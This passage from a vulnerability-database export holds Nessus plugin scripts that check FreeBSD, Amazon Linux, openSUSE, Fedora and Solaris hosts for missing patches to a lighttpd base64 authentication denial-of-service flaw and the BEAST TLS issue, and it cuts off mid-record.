exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"lighttpd<1.4.30\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:52", "description": "Integer signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.", "cvss3": {}, "published": "2013-09-04T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : lighttpd (ALAS-2012-107)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:lighttpd", "p-cpe:/a:amazon:linux:lighttpd-debuginfo", "p-cpe:/a:amazon:linux:lighttpd-fastcgi", "p-cpe:/a:amazon:linux:lighttpd-mod_geoip", "p-cpe:/a:amazon:linux:lighttpd-mod_mysql_vhost", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2012-107.NASL", "href": "https://www.tenable.com/plugins/nessus/69597", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2012-107.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69597);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/04/18 15:09:34\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_xref(name:\"ALAS\", value:\"2012-107\");\n\n script_name(english:\"Amazon Linux AMI : lighttpd (ALAS-2012-107)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Integer signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2012-107.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update lighttpd' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-debuginfo-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-fastcgi-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_geoip-1.4.31-1.2.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-fastcgi / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:21:58", "description": "- added lighttpd-1.4.30_head_fixes.patch: cherry picked 4 fixes from HEAD :\n\n - [ssl] include more headers explicitly\n\n - list all network handlers in lighttpd -V (fixes lighttpd#2376)\n\n - Move fdevent subsystem includes to implementation files to reduce conflicts (fixes lighttpd#2373)\n\n - [ssl] fix segfault in counting renegotiations for openssl versions without TLSEXT/SNI\n\n - update to 1.4.30: (bnc#733607)\n\n - Always use our ‘own’ md5 implementation, fixes linking issues on MacOS (fixes #2331)\n\n - Limit amount of bytes we send in one go; fixes stalling in one connection and timeouts on slow systems.\n\n - [ssl] fix build errors when Elliptic-Curve Diffie-Hellman is disabled\n\n - Add static-file.disable-pathinfo option to prevent handling of urls like …/secret.php/image.jpg as static file\n\n - Don’t overwrite 401 (auth required) with 501 (unknown method) (fixes #2341)\n\n - Fix mod_status bug: always showed “0/0” in the “Read” column for uploads (fixes #2351)\n\n - [mod_auth] Fix signedness error in http_auth (fixes #2370, CVE-2011-4362)\n\n - [ssl] count renegotiations to prevent client renegotiations\n\n - [ssl] add option to honor server cipher order (fixes #2364, BEAST attack)\n\n - [core] accept dots in ipv6 addresses in host header (fixes #2359)\n\n - [ssl] fix ssl connection aborts if files are larger than the MAX_WRITE_LIMIT (256kb)\n\n - [libev/cgi] fix waitpid ECHILD errors in cgi with libev (fixes #2324)\n\n - add automake as buildrequire to avoid implicit dependency", "cvss3": {}, "published": "2014-06-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : lighttpd (openSUSE-2012-110)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool", "p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl", "p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav", "p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo", "cpe:/o:novell:opensuse:12.1", "p-cpe:/a:novell:opensuse:lighttpd", "p-cpe:/a:novell:opensuse:lighttpd-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-debugsource", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml", "p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_geoip", "p-cpe:/a:novell:opensuse:lighttpd-mod_geoip-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet", "p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost", "p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo"], "id": "OPENSUSE-2012-110.NASL", "href": "https://www.tenable.com/plugins/nessus/74546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-110.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74546);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2011-4362\");\n\n script_name(english:\"openSUSE Security Update : lighttpd (openSUSE-2012-110)\");\n script_summary(english:\"Check for the openSUSE-2012-110 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - added lighttpd-1.4.30_head_fixes.patch: cherry picked 4\n fixes from HEAD :\n\n - [ssl] include more headers explicitly\n\n - list all network handlers in lighttpd -V (fixes\n lighttpd#2376)\n\n - Move fdevent subsystem includes to implementation files\n to reduce conflicts (fixes lighttpd#2373)\n\n - [ssl] fix segfault in counting renegotiations for\n openssl versions without TLSEXT/SNI\n\n - update to 1.4.30: (bnc#733607)\n\n - Always use our ‘own’ md5 implementation,\n fixes linking issues on MacOS (fixes #2331)\n\n - Limit amount of bytes we send in one go; fixes stalling\n in one connection and timeouts on slow systems.\n\n - [ssl] fix build errors when Elliptic-Curve\n Diffie-Hellman is disabled\n\n - Add static-file.disable-pathinfo option to prevent\n handling of urls like …/secret.php/image.jpg as\n static file\n\n - Don’t overwrite 401 (auth required) with 501\n (unknown method) (fixes #2341)\n\n - Fix mod_status bug: always showed “0/0” in\n the “Read” column for uploads (fixes #2351)\n\n - [mod_auth] Fix signedness error in http_auth (fixes\n #2370, CVE-2011-4362)\n\n - [ssl] count renegotiations to prevent client\n renegotiations\n\n - [ssl] add option to honor server cipher order (fixes\n #2364, BEAST attack)\n\n - [core] accept dots in ipv6 addresses in host header\n (fixes #2359)\n\n - [ssl] fix ssl connection aborts if files are larger than\n the MAX_WRITE_LIMIT (256kb)\n\n - [libev/cgi] fix waitpid ECHILD errors in cgi with libev\n (fixes #2324)\n\n - add automake as buildrequire to avoid implicit\n dependency\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=733607\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_cml-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_geoip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_magnet-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_mysql_vhost-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_rrdtool-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_trigger_b4_dl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lighttpd-mod_webdav-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-debugsource-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_cml-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_cml-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_geoip-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_geoip-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_magnet-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_magnet-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_mysql_vhost-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_mysql_vhost-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_rrdtool-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_rrdtool-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_trigger_b4_dl-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_trigger_b4_dl-debuginfo-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_webdav-1.4.30-2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", reference:\"lighttpd-mod_webdav-debuginfo-1.4.30-2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd / lighttpd-debuginfo / lighttpd-debugsource / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:45", "description": "According to its banner, the version of lighttpd running on the remote host is prior to 1.4.30. It is, therefore, affected by a denial of service vulnerability. The HTTP server allows out-of-bounds values to be decoded during the auth process and later uses these values as offsets. Using negative values as offsets can result in application crashes.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2011-12-28T00:00:00", "type": "nessus", "title": "lighttpd < 1.4.30 base64_decode Function Out-of-Bounds Read Error DoS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:lighttpd:lighttpd"], "id": "LIGHTTPD_1_4_30.NASL", "href": "https://www.tenable.com/plugins/nessus/57410", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57410);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_bugtraq_id(50851);\n script_xref(name:\"EDB-ID\", value:\"18295\");\n\n script_name(english:\"lighttpd < 1.4.30 base64_decode Function Out-of-Bounds Read Error DoS\");\n script_summary(english:\"Checks version in Server response header.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a denial of service\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of lighttpd running on the remote\nhost is prior to 1.4.30. It is, therefore, affected by a denial of\nservice vulnerability. The HTTP server allows out-of-bounds values to\nbe decoded during the auth process and later uses these values as\noffsets. Using negative values as offsets can result in application\ncrashes.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cdaac48a\");\n script_set_attribute(attribute:\"see_also\", value:\"http://redmine.lighttpd.net/issues/2370\");\n script_set_attribute(attribute:\"see_also\", value:\"http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2011_01.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to lighttpd version 1.4.30 or later. Alternatively, apply the\nvendor-supplied patch or disable mod_auth.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/28\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:lighttpd:lighttpd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_keys(\"www/lighttpd\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"lighttpd\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\nport = get_http_port(default:80);\napp_info = vcf::get_app_info(app:appname, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [{\"fixed_version\":\"1.4.30\"}];\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:24", "description": "This update fixes CVE-2011-4362 by updating to the latest release. It also fixes problems that had been reported with previous releases, such as ssl-related crashes on startup. This update fixes some minor SSL related problems, as well as a connection stall bug. This update fixes some minor SSL related problems, as well as a connection stall bug. This update fixes some minor SSL related problems, as well as a connection stall bug.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2012-06-26T00:00:00", "type": "nessus", "title": "Fedora 17 : lighttpd-1.4.31-1.fc17 (2012-9040)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4362"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:lighttpd", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2012-9040.NASL", "href": "https://www.tenable.com/plugins/nessus/59689", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-9040.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59689);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4362\");\n script_bugtraq_id(50851);\n script_xref(name:\"FEDORA\", value:\"2012-9040\");\n\n script_name(english:\"Fedora 17 : lighttpd-1.4.31-1.fc17 (2012-9040)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes CVE-2011-4362 by updating to the latest release. It\nalso fixes problems that had been reported with previous releases,\nsuch as ssl-related crashes on startup. This update fixes some minor\nSSL related problems, as well as a connection stall bug. This update\nfixes some minor SSL related problems, as well as a connection stall\nbug. This update fixes some minor SSL related problems, as well as a\nconnection stall bug.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=758624\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-June/082765.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28c4e40a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected lighttpd package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:lighttpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"lighttpd-1.4.31-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"lighttpd\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:44", "description": "NSS_NSPR_JSS 3.13.1 Solaris_x86: NSPR 4.8.9 / NSS 3.13.1 / JSS 4.3.\nDate this patch was last updated by Sun : Feb/08/12", "cvss3": {}, "published": "2018-03-12T00:00:00", "type": "nessus", "title": "Solaris 10 (x86) : 125359-15 (BEAST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:oracle:solaris:10:125359", "cpe:/o:oracle:solaris:10"], "id": "SOLARIS10_X86_125359-15.NASL", "href": "https://www.tenable.com/plugins/nessus/107926", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(107926);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2011-3389\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0547\");\n\n script_name(english:\"Solaris 10 (x86) : 125359-15 (BEAST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 125359-15\");\n script_set_attribute(attribute:\"description\", value:\n\"NSS_NSPR_JSS 3.13.1 Solaris_x86: NSPR 4.8.9 / NSS 3.13.1 / JSS 4.3.\nDate this patch was last updated by Sun : Feb/08/12\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/125359-15\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install patch 125359-15 or higher\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2011-3389\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/09/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 